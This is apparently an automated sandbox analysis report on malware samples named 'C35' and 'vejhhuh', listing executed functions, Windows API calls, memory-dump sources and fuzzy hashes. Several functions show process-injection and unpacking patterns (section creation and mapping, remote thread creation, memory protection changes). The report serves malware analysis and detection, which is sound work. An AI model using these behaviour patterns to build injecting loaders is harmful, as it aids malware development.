Snapshot File: hcaresult_6_2_40b000_C35.jbxd

Similarity

API ID: AddressHandleModuleProcProtectVirtual
String ID:
API String ID: 2099061454-3916222277
Opcode ID: 491ec6e3e3ee18dcc8e26f8905b2a401390c51c225c0d3e182c0eb7754f552da
Instruction ID: 9b101dc19ab9e509907a73f40bd9e615ad2773d8f65bdac5e4741cefec9585ad
Opcode Fuzzy Hash: 491ec6e3e3ee18dcc8e26f8905b2a401390c51c225c0d3e182c0eb7754f552da
Instruction Fuzzy Hash: 273164516187C4EAE311CB64FC087523AA2AF79704F448069A148877B3E7BE065ADB6E

Function 008B16E7 Relevance: 3.0, APIs: 2, Instructions: 41
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 008B170F
Module32First.KERNEL32(00000000,00000224), ref: 008B172F

Memory Dump Source

Source File: 00000006.00000002.2315796782.00000000008AE000.00000040.00000020.00020000.00000000.sdmp, Offset: 008AE000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_8ae000_C35.jbxd

Yara matches

Similarity

API ID: CreateFirstModule32SnapshotToolhelp32
String ID:
API String ID: 3833638111-0
Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
Instruction ID: 25ec24e02dee7173ac107d73f022e1e21d0f6ac54ed4f7643fa163adff3d49d0
Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
Instruction Fuzzy Hash: 67F0F6325003116BDB203BF8AC9DFAE72E8FF59721F500528E642DA2C0DF70EC464A65

Function 006B0E0F Relevance: 3.0, APIs: 2, Instructions: 15
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetErrorMode.KERNELBASE(00000400,?,?,006B0223,?,?), ref: 006B0E19
SetErrorMode.KERNELBASE(00000000,?,?,006B0223,?,?), ref: 006B0E1E

Memory Dump Source

Source File: 00000006.00000002.2315529494.00000000006B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6b0000_C35.jbxd

Yara matches

Similarity

API ID: ErrorMode
String ID:
API String ID: 2340568224-0
Opcode ID: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
Instruction ID: 5ec0122905795958cf8b6ea84eb92189ad46b0a0d2fb6fa6a8bc84ef3f06bca4
Opcode Fuzzy Hash: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
Instruction Fuzzy Hash: 19D0123114512877D7002A94DC09BCE7F1CDF05B62F008411FB0DD9180C770994147E5

Function 00401991 Relevance: 1.3, APIs: 1, Instructions: 64
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00001388), ref: 004019E0

Memory Dump Source

Source File: 00000006.00000002.2315218482.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_C35.jbxd

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: d33cb06ca2e59f630b26b88e285b187a032fff555d198fadb91c317e02e733b4
Instruction ID: 467f6a5a6a8686429b8edb25725d085830e465699c84407eda40119e08959f9c
Opcode Fuzzy Hash: d33cb06ca2e59f630b26b88e285b187a032fff555d198fadb91c317e02e733b4
Instruction Fuzzy Hash: 8C1121B1709204EBD700AA849DA2EBB3258AB01744F300137B653B90F1D13DA913BBAF

Function 004019A9 Relevance: 1.3, APIs: 1, Instructions: 58
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00001388), ref: 004019E0

Memory Dump Source

Source File: 00000006.00000002.2315218482.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_C35.jbxd

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: 9898664b938d16c2b1b4e01e78ced3648756847b2d56eb08e3b848ce02c96c48
Instruction ID: 4b76d244f62df5aef60288e90a8a0e9aa1e58495ecd570ece09185835f727098
Opcode Fuzzy Hash: 9898664b938d16c2b1b4e01e78ced3648756847b2d56eb08e3b848ce02c96c48
Instruction Fuzzy Hash: E801CCB1709204EBDB009A849DA2FBB3254AB45704F304177BA53B91F1C13EA513BBAF

Function 004019AF Relevance: 1.3, APIs: 1, Instructions: 52
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00001388), ref: 004019E0

Memory Dump Source

Source File: 00000006.00000002.2315218482.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_C35.jbxd

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: 30d86e508bd442fb29cd97d6ceaaa55f0d5a2af66fd42037641b9e80c01793f8
Instruction ID: a86496d5c410a92ffac719b016bd7af058b42942f4ddbef250fd57ab9bd781cb
Opcode Fuzzy Hash: 30d86e508bd442fb29cd97d6ceaaa55f0d5a2af66fd42037641b9e80c01793f8
Instruction Fuzzy Hash: BA01DE71309204EBDB00AA848C81BAB3264AB45300F204177F653790F1D23E9522AF5B

Function 004019B8 Relevance: 1.3, APIs: 1, Instructions: 52
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00001388), ref: 004019E0

Memory Dump Source

Source File: 00000006.00000002.2315218482.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_C35.jbxd

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: c7b252bb0c0a7946a725b17b144dae5cf8c90d4b141733e10c6a991a9ec1216b
Instruction ID: 05dce09b803754dc438333d14fb16c9d77e26ddd6ef6fde50045693b00902851
Opcode Fuzzy Hash: c7b252bb0c0a7946a725b17b144dae5cf8c90d4b141733e10c6a991a9ec1216b
Instruction Fuzzy Hash: 67019E31309104EBEB009B949C82BAB3764AF46314F2445B7F652B91E1D63D9922AB5B

Function 008B13A6 Relevance: 1.3, APIs: 1, Instructions: 48memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040), ref: 008B13F7

Memory Dump Source

Source File: 00000006.00000002.2315796782.00000000008AE000.00000040.00000020.00020000.00000000.sdmp, Offset: 008AE000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_8ae000_C35.jbxd

Yara matches

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
Instruction ID: ee70456a628e93b330df1fef1e6eaabcb8f27aee6136df57d07ed7a34b4e25ac
Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
Instruction Fuzzy Hash: FD113F79A00208EFDB01DF98C989E99BBF5EF08350F4580A4F9489B361D371EA50DF80

Function 00419A40 Relevance: 1.3, APIs: 1, Instructions: 6memoryCOMMON

Download Yara Rule

APIs

LocalAlloc.KERNELBASE(00000000,00515FEC,0041A04B), ref: 00419A48

Memory Dump Source

Source File: 00000006.00000002.2315244628.000000000040B000.00000020.00000001.01000000.00000006.sdmp, Offset: 0040B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_40b000_C35.jbxd

Similarity

API ID: AllocLocal
String ID:
API String ID: 3494564517-0
Opcode ID: 9ec18e11195fab8466a21664cf9d2760616124b952149bfa647060a6f0581e67
Instruction ID: cdbbb9e7b83af8b631a1fc3647d71b0b27ee278e0583f88c42ef53277000976a
Opcode Fuzzy Hash: 9ec18e11195fab8466a21664cf9d2760616124b952149bfa647060a6f0581e67
Instruction Fuzzy Hash: 26B092B8502600DBD2408B60EC48F953A68E398202F009260FA0085160E7700805AA10

Non-executed Functions

Function 00419CD0 Relevance: 6.0, APIs: 4, Instructions: 43memoryCOMMON

Download Yara Rule

APIs

QueryDosDeviceW.KERNEL32(00000000,?,00000000), ref: 00419D04
FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00419D1F
HeapDestroy.KERNEL32(00000000), ref: 00419D3E
GetNumaProcessorNode.KERNEL32(?,00000000), ref: 00419D4D

Memory Dump Source

Source File: 00000006.00000002.2315244628.000000000040B000.00000020.00000001.01000000.00000006.sdmp, Offset: 0040B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_40b000_C35.jbxd

Similarity

API ID: DestroyDeviceEnvironmentFreeHeapNodeNumaProcessorQueryStrings
String ID:
API String ID: 4159173863-0
Opcode ID: 10b99885ae077d5513f7b4f4fe7ada249d912d148d05b578c42a7b65b8aafc25
Instruction ID: 6966600bf98115fc682df4bae7263d4ee42c52adae4737bd1ec5881763e77970
Opcode Fuzzy Hash: 10b99885ae077d5513f7b4f4fe7ada249d912d148d05b578c42a7b65b8aafc25
Instruction Fuzzy Hash: B9018474600204DBE750EB64FC59BDA77A8E71C306F408176FA4996290EB745DC8CBD9

Function 00419C50 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 38COMMON

Download Yara Rule

APIs

BuildCommDCBW.KERNEL32(00000000,?), ref: 00419C64
FreeEnvironmentStringsA.KERNEL32(00000000), ref: 00419C76

Strings

-, xrefs: 00419CAF

Memory Dump Source

Source File: 00000006.00000002.2315244628.000000000040B000.00000020.00000001.01000000.00000006.sdmp, Offset: 0040B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_40b000_C35.jbxd

Similarity

API ID: BuildCommEnvironmentFreeStrings
String ID: -
API String ID: 2991353152-2547889144
Opcode ID: f4b958283a58c4c84f181a912c03a312a762f8a4ec0123b7dccd55bff0bc5cba
Instruction ID: eedbb3df8d483a19463c8038d1f41fe70976e2133a91f77c3139b26c4217ee6d
Opcode Fuzzy Hash: f4b958283a58c4c84f181a912c03a312a762f8a4ec0123b7dccd55bff0bc5cba
Instruction Fuzzy Hash: 12F02231844204A6DB209FA8DD907EF7BE8E709320F20022AE98467381E3380D86D7DA

Analysis Process: vejhhuhPID: 4500, Parent PID: 1044COMMON

Execution Graph

Execution Coverage:	6.7%
Dynamic/Decrypted Code Coverage:	19.1%
Signature Coverage:	0%
Total number of Nodes:	257
Total number of Limit Nodes:	7

Executed Functions

Function 00419D70 Relevance: 52.8, APIs: 28, Strings: 2, Instructions: 289
filewindowtimeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetVolumeInformationA.KERNEL32(00000000,?,00000000,?,?,?,?,00000000), ref: 00419DBF
InterlockedCompareExchange.KERNEL32(?,00000000,00000000), ref: 00419E53
GetFocus.USER32 ref: 00419E59
ReadConsoleW.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 00419E64
FindAtomW.KERNEL32(00000000), ref: 00419E6B
SetConsoleMode.KERNEL32(00000000,00000000), ref: 00419E73
GetDefaultCommConfigA.KERNEL32(00000000,?,00000000), ref: 00419E9A
CopyFileW.KERNEL32(00000000,00000000,00000000), ref: 00419EA3
CreatePipe.KERNEL32(?,00000000,00000000,00000000), ref: 00419EB9
GetEnvironmentStrings.KERNEL32 ref: 00419EBF
WriteConsoleOutputA.KERNEL32(00000000,?,?,?,?), ref: 00419F04
GetModuleFileNameA.KERNEL32(00000000,?,00000000), ref: 00419F13
GetSystemTimeAdjustment.KERNEL32(00000000,00000000,00000000), ref: 00419F1C
ObjectPrivilegeAuditAlarmA.ADVAPI32(00000000,00000000,00000000,00000000,00000000,00000000), ref: 00419F31
WaitForSingleObject.KERNEL32(00000000,00000000), ref: 00419F42
SetCommState.KERNELBASE(00000000,00000000), ref: 00419F69
GetConsoleAliasesLengthW.KERNEL32(00000000), ref: 00419F9A
GetComputerNameA.KERNEL32(?,?), ref: 00419FAE
CopyFileW.KERNEL32(0041C3E4,0041C3B8,00000000), ref: 00419FBF
GetFileAttributesA.KERNEL32(00000000), ref: 00419FC6
GetConsoleAliasExesLengthA.KERNEL32 ref: 00419FCC
GetBinaryType.KERNEL32(0041C400,?), ref: 00419FDE
FormatMessageA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 00419FF1
GetLongPathNameA.KERNEL32(0041C418,?,00000000), ref: 0041A004
GetCommTimeouts.KERNEL32(00000000,00000000), ref: 0041A00C
LoadLibraryA.KERNELBASE(0041C424), ref: 0041A092

Strings

k`, xrefs: 0041A0CD
}$, xrefs: 0041A0F5

Memory Dump Source

Source File: 00000008.00000002.2561224243.000000000040B000.00000020.00000001.01000000.00000007.sdmp, Offset: 0040B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_40b000_vejhhuh.jbxd

Similarity

API ID: Console$File$CommName$CopyLengthObject$AdjustmentAlarmAliasAliasesAtomAttributesAuditBinaryCompareComputerConfigCreateDefaultEnvironmentExchangeExesFindFocusFormatInformationInterlockedLibraryLoadLongMessageModeModuleOutputPathPipePrivilegeReadSingleStateStringsSystemTimeTimeoutsTypeVolumeWaitWrite
String ID: k`$}$
API String ID: 4249349521-956986773
Opcode ID: 8a0022938582e7786455545f2d2a0aa76fb25a487d10df4c359a7132c8526bce
Instruction ID: 1ffa0da19b14ee91b85dcd2083993de682bc4a00c742463c13e7108b831189b5
Opcode Fuzzy Hash: 8a0022938582e7786455545f2d2a0aa76fb25a487d10df4c359a7132c8526bce
Instruction Fuzzy Hash: AAA19071802524ABD724DB61DC58FDF7B68EF5D311F00816AF609A2161DB381A85CFED

Function 004014C4 Relevance: 10.8, APIs: 7, Instructions: 277
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000008.00000002.2561188949.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_vejhhuh.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c7f1aecd654c101580c33caa0697f0a4eb1be03b42db6f7e8c2cb2cd626b67d0
Instruction ID: a2440897234d9063cbd2a71cb92c382042c3cd10596cdc4f18a7c269882a1901
Opcode Fuzzy Hash: c7f1aecd654c101580c33caa0697f0a4eb1be03b42db6f7e8c2cb2cd626b67d0
Instruction Fuzzy Hash: 0981D5B4504244FBDB208F95CC49FEB7BB8EF81740F20416BF902BA1E5D6749902DB66

Function 004015D5 Relevance: 10.7, APIs: 7, Instructions: 166
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 0040166F
NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 0040169C
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 004016BF
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 004016DD
NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 0040171E
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 0040174F
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 00401771

Memory Dump Source

Source File: 00000008.00000002.2561188949.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_vejhhuh.jbxd

Similarity

API ID: Section$View$Create$DuplicateObject
String ID:
API String ID: 1546783058-0
Opcode ID: 00fdf6c0c0cec7800d010119070486e13fc8524dff54e87bd902aee4aa991197
Instruction ID: 5b275a0397ac31cab10c66c3112b8ecfdbc4447489e22d1c2cba3eb21d005058
Opcode Fuzzy Hash: 00fdf6c0c0cec7800d010119070486e13fc8524dff54e87bd902aee4aa991197
Instruction Fuzzy Hash: 8251F9B5900245BBEB208F91CC48FEF7BB8EF85710F10416AFA11BA2A5D7759941CB64

Function 004015DF Relevance: 10.7, APIs: 7, Instructions: 164
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 0040166F
NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 0040169C
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 004016BF
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 004016DD
NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 0040171E
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 0040174F
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 00401771

Memory Dump Source

Source File: 00000008.00000002.2561188949.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_vejhhuh.jbxd

Similarity

API ID: Section$View$Create$DuplicateObject
String ID:
API String ID: 1546783058-0
Opcode ID: 7737ff869299ca3ca4dc99499382bd8f34633e79eedf9272cde4017979e02a10
Instruction ID: aa7ad941c6157971e71dc2736092b98b642c15495c2c07021be349f0f8194e9f
Opcode Fuzzy Hash: 7737ff869299ca3ca4dc99499382bd8f34633e79eedf9272cde4017979e02a10
Instruction Fuzzy Hash: 4D51FAB5900249BBEB208F91CC48FEF7BB8EF85710F10015AFA11BA2A5D7749945CB64

Function 004015F2 Relevance: 10.7, APIs: 7, Instructions: 164
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 0040166F
NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 0040169C
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 004016BF
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 004016DD
NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 0040171E
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 0040174F
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 00401771

Memory Dump Source

Source File: 00000008.00000002.2561188949.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_vejhhuh.jbxd

Similarity

API ID: Section$View$Create$DuplicateObject
String ID:
API String ID: 1546783058-0
Opcode ID: d18b6c02a51361cd05e07a842d3e0aa79c0e363c2c3393af6b77ca0a2f8cc2c4
Instruction ID: 51677960ee3875d5e78d4b2c0b9a124aae989836c1cf5ff6a0c78d9f2f0b6c9a
Opcode Fuzzy Hash: d18b6c02a51361cd05e07a842d3e0aa79c0e363c2c3393af6b77ca0a2f8cc2c4
Instruction Fuzzy Hash: 8E51FAB5900249BBEB208F91CC48FAFBBB8EF85710F10415AF911BA2A5D7759941CB64

Function 004015E6 Relevance: 10.7, APIs: 7, Instructions: 163
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 0040166F
NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 0040169C
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 004016BF
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 004016DD
NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 0040171E
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 0040174F
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 00401771

Memory Dump Source

Source File: 00000008.00000002.2561188949.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_vejhhuh.jbxd

Similarity

API ID: Section$View$Create$DuplicateObject
String ID:
API String ID: 1546783058-0
Opcode ID: 17d0a7aae4e5eab7518e2aba78030d0a90555c236ae4342c3ab8b69e33cd9608
Instruction ID: 771dbcf6e2504e630b0d67c3c545d31db11f89db77175d6a648901ef483dfe93
Opcode Fuzzy Hash: 17d0a7aae4e5eab7518e2aba78030d0a90555c236ae4342c3ab8b69e33cd9608
Instruction Fuzzy Hash: 5451F9B5900249BFEB208F91CC48FEFBBB8EF85B10F100159F911BA2A5D7709945CB64

Function 00403043 Relevance: 3.2, APIs: 2, Instructions: 168
nativethreadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlCreateUserThread.NTDLL ref: 00403177
NtTerminateProcess.NTDLL ref: 00403190

Memory Dump Source

Source File: 00000008.00000002.2561188949.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_vejhhuh.jbxd

Similarity

API ID: CreateProcessTerminateThreadUser
String ID:
API String ID: 1921587553-0
Opcode ID: 8dd8c1b6c2a2e81b31e5df05537a0a765b57e58f23bcff5050bac5d1a8738f05
Instruction ID: 174b4c01c38e91558bfb09f2734ea8af57ab2b253068959c7a4b5a028629c542
Opcode Fuzzy Hash: 8dd8c1b6c2a2e81b31e5df05537a0a765b57e58f23bcff5050bac5d1a8738f05
Instruction Fuzzy Hash: 2D415A31218E084FD768EF5CA84976277D5FB98311F6A43BAE809D7385EA34DC1183C9

Function 0067003C Relevance: 11.0, APIs: 4, Strings: 2, Instructions: 515
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004), ref: 0067024D

Strings

kernel32.dll, xrefs: 0067008F, 00670095
cess, xrefs: 0067018D

Memory Dump Source

Source File: 00000008.00000002.2561500633.0000000000670000.00000040.00001000.00020000.00000000.sdmp, Offset: 00670000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_670000_vejhhuh.jbxd

Yara matches

Similarity

API ID: AllocVirtual
String ID: cess$kernel32.dll
API String ID: 4275171209-1230238691
Opcode ID: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
Instruction ID: 3765450f4516cd5a446ec64091ac8bb535a0f3870ef1ebb4caee572cfbf4afc2
Opcode Fuzzy Hash: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
Instruction Fuzzy Hash: 69526A74A01229DFEB64CF58C985BA8BBB1BF09304F1480D9E54DAB351DB30AE95DF24

Function 00419A70 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 63
librarymemoryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleW.KERNEL32(00515FF0), ref: 00419B4F
GetProcAddress.KERNEL32(00000000,00420518), ref: 00419B8C
VirtualProtect.KERNELBASE(00515E34,00515FEC,00000040,?), ref: 00419BAB

Strings

, xrefs: 00419AB5

Memory Dump Source

Source File: 00000008.00000002.2561224243.000000000040B000.00000020.00000001.01000000.00000007.sdmp, Offset: 0040B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_40b000_vejhhuh.jbxd

Similarity

API ID: AddressHandleModuleProcProtectVirtual
String ID:
API String ID: 2099061454-3916222277
Opcode ID: 491ec6e3e3ee18dcc8e26f8905b2a401390c51c225c0d3e182c0eb7754f552da
Instruction ID: 9b101dc19ab9e509907a73f40bd9e615ad2773d8f65bdac5e4741cefec9585ad
Opcode Fuzzy Hash: 491ec6e3e3ee18dcc8e26f8905b2a401390c51c225c0d3e182c0eb7754f552da
Instruction Fuzzy Hash: 273164516187C4EAE311CB64FC087523AA2AF79704F448069A148877B3E7BE065ADB6E

Function 0076083F Relevance: 3.0, APIs: 2, Instructions: 41
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 00760867
Module32First.KERNEL32(00000000,00000224), ref: 00760887

Memory Dump Source

Source File: 00000008.00000002.2562004757.000000000075D000.00000040.00000020.00020000.00000000.sdmp, Offset: 0075D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_75d000_vejhhuh.jbxd

Yara matches

Similarity

API ID: CreateFirstModule32SnapshotToolhelp32
String ID:
API String ID: 3833638111-0
Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
Instruction ID: b37553699337ad379a08845bc96b5f6d2e2723cf41909b141697a890a3333982
Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
Instruction Fuzzy Hash: 02F09636100711AFD7207BFAA88DB6F76E8AF59725F140528EA47934C0DB74EC4546E1

Function 00670E0F Relevance: 3.0, APIs: 2, Instructions: 15
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetErrorMode.KERNELBASE(00000400,?,?,00670223,?,?), ref: 00670E19
SetErrorMode.KERNELBASE(00000000,?,?,00670223,?,?), ref: 00670E1E

Memory Dump Source

Source File: 00000008.00000002.2561500633.0000000000670000.00000040.00001000.00020000.00000000.sdmp, Offset: 00670000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_670000_vejhhuh.jbxd

Yara matches

Similarity

API ID: ErrorMode
String ID:
API String ID: 2340568224-0
Opcode ID: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
Instruction ID: 5a5a572b8c797ad976ea18bf62a4cab0582b95af9600aa588e6fb0acf5fca8fa
Opcode Fuzzy Hash: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
Instruction Fuzzy Hash: 6FD01231145128B7D7002A94DC09BCD7B1CDF09B62F008411FB0DD9180C770994046E5

Function 00401991 Relevance: 1.3, APIs: 1, Instructions: 64
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00001388), ref: 004019E0

Memory Dump Source

Source File: 00000008.00000002.2561188949.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_vejhhuh.jbxd

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: d33cb06ca2e59f630b26b88e285b187a032fff555d198fadb91c317e02e733b4
Instruction ID: 467f6a5a6a8686429b8edb25725d085830e465699c84407eda40119e08959f9c
Opcode Fuzzy Hash: d33cb06ca2e59f630b26b88e285b187a032fff555d198fadb91c317e02e733b4
Instruction Fuzzy Hash: 8C1121B1709204EBD700AA849DA2EBB3258AB01744F300137B653B90F1D13DA913BBAF

Function 004019A9 Relevance: 1.3, APIs: 1, Instructions: 58
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00001388), ref: 004019E0

Memory Dump Source

Source File: 00000008.00000002.2561188949.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_vejhhuh.jbxd

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: 9898664b938d16c2b1b4e01e78ced3648756847b2d56eb08e3b848ce02c96c48
Instruction ID: 4b76d244f62df5aef60288e90a8a0e9aa1e58495ecd570ece09185835f727098
Opcode Fuzzy Hash: 9898664b938d16c2b1b4e01e78ced3648756847b2d56eb08e3b848ce02c96c48
Instruction Fuzzy Hash: E801CCB1709204EBDB009A849DA2FBB3254AB45704F304177BA53B91F1C13EA513BBAF

Function 004019AF Relevance: 1.3, APIs: 1, Instructions: 52
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00001388), ref: 004019E0

Memory Dump Source

Source File: 00000008.00000002.2561188949.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_vejhhuh.jbxd

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: 30d86e508bd442fb29cd97d6ceaaa55f0d5a2af66fd42037641b9e80c01793f8
Instruction ID: a86496d5c410a92ffac719b016bd7af058b42942f4ddbef250fd57ab9bd781cb
Opcode Fuzzy Hash: 30d86e508bd442fb29cd97d6ceaaa55f0d5a2af66fd42037641b9e80c01793f8
Instruction Fuzzy Hash: BA01DE71309204EBDB00AA848C81BAB3264AB45300F204177F653790F1D23E9522AF5B

